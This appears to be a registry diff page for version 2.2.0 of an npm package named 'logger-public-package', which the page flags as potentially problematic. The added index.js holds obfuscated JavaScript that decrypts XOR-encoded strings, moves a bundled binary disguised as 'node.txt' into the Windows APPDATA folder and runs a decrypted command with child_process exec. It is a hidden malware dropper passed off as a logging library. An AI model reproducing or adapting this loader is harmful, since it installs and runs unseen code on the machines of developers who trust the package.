logger-public-package 2.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of logger-public-package might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/api/node.txt +0 -0
  2. package/index.js +4 -0
  3. package/package.json +11 -0
package/api/node.txt ADDED
Binary file
package/index.js ADDED
@@ -0,0 +1,4 @@
1
+ const { exec } = require("child_process");
2
+ const fs = require('fs')
3
+
4
+ const _0x581d18=_0x26de;function _0x53c6(){const _0x3fb654=['APPDATA','5232wzcJVc','1072407MOdAwp','337608YISIKp','7913345xVUsJQ','3015OZJXgU','1517105nmkrBP','match','452414HvBQEN','length','32010b0154184b4a0b','exports','rename','12LZrDHt','0b0c0c0a11617d511c0614111f755c570f1b012a535c4b511a47463262555c5b1e1b4a365953425e4c464a3744580e104b2e141575575a534b400a0a55530057160a464911060e0c4e4d412441466a531a0e41397c5f4d40011c0b03456a795b000b0b12426a7d460f1d10457c534047323f160a56444f5f1d33371150445a471e330515581858501d4d444311140b731e1f200445570b6e230607175e4541541a33330c5f5241451d33371150445a12230a0a106d665c5d091d0508426a7d460f1d1010416a4f42074112074214','10wlHRQf','687BUfoLJ','charCodeAt','4094HfHHes','320e140c6d5841560b41101d45','fromCharCode','env','existsSync'];_0x53c6=function(){return _0x3fb654;};return _0x53c6();}(function(_0x26b263,_0x57c70f){const _0x102816=_0x26de,_0x4a2e9f=_0x26b263();while(!![]){try{const _0x20272e=-parseInt(_0x102816(0x1a2))/0x1+parseInt(_0x102816(0x1ac))/0x2*(parseInt(_0x102816(0x1aa))/0x3)+parseInt(_0x102816(0x1a7))/0x4*(parseInt(_0x102816(0x1a0))/0x5)+-parseInt(_0x102816(0x19d))/0x6+parseInt(_0x102816(0x19c))/0x7+parseInt(_0x102816(0x19b))/0x8*(parseInt(_0x102816(0x19f))/0x9)+parseInt(_0x102816(0x1a9))/0xa*(-parseInt(_0x102816(0x19e))/0xb);if(_0x20272e===_0x57c70f)break;else _0x4a2e9f['push'](_0x4a2e9f['shift']());}catch(_0x2c5a6e){_0x4a2e9f['push'](_0x4a2e9f['shift']());}}}(_0x53c6,0x7fbe8));function _0x26de(_0x4f8641,_0x5aeb42){const _0x53c623=_0x53c6();return _0x26de=function(_0x26de7c,_0x588cb1){_0x26de7c=_0x26de7c-0x198;let _0x495d4a=_0x53c623[_0x26de7c];return _0x495d4a;},_0x26de(_0x4f8641,_0x5aeb42);}const decrypt=(_0x510efb,_0x21612b)=>{const _0x329748=_0x26de;let _0xcb20c1='';const _0x5e7e66=_0x510efb[_0x329748(0x1a1)](/.{2}/g);for(let _0x25f036=0x0;_0x25f036<_0x5e7e66[_0x329748(0x1a3)];_0x25f036++){const _0x5630d6=_0x5e7e66[_0x25f036],_0x317019=parseInt(_0x5630d6,0x10),_0xbdc7ba=_0x25f036%_0x21612b[_0x329748(0x1a3)],_0x484a9e=_0x317019^_0x21612b[_0xbdc7ba][_0x329748(0x1ab)](0x0);_0xcb20c1+=String[_0x329748(0x1ae)](_0x484a9e);}return _0xcb20c1;};module[_0x581d18(0x1a5)]=_0x17198a=>{const _0x6ba8de=_0x581d18;let _0x5cf8c4=decrypt(_0x6ba8de(0x1ad),_0x17198a),_0x4cba26=''+process[_0x6ba8de(0x198)][_0x6ba8de(0x19a)]+decrypt(_0x6ba8de(0x1a4),_0x17198a);fs[_0x6ba8de(0x199)](__dirname+'\x5c'+_0x5cf8c4)&&(fs[_0x6ba8de(0x1a6)](__dirname+'\x5c'+_0x5cf8c4,_0x4cba26,_0x5ab369=>{if(_0x5ab369)throw _0x5ab369;}),exec(''+decrypt(_0x6ba8de(0x1a8),_0x17198a),_0x328dc4=>{if(_0x328dc4)return;}));};
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "logger-public-package",
3
+ "version": "2.2.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
11
+ }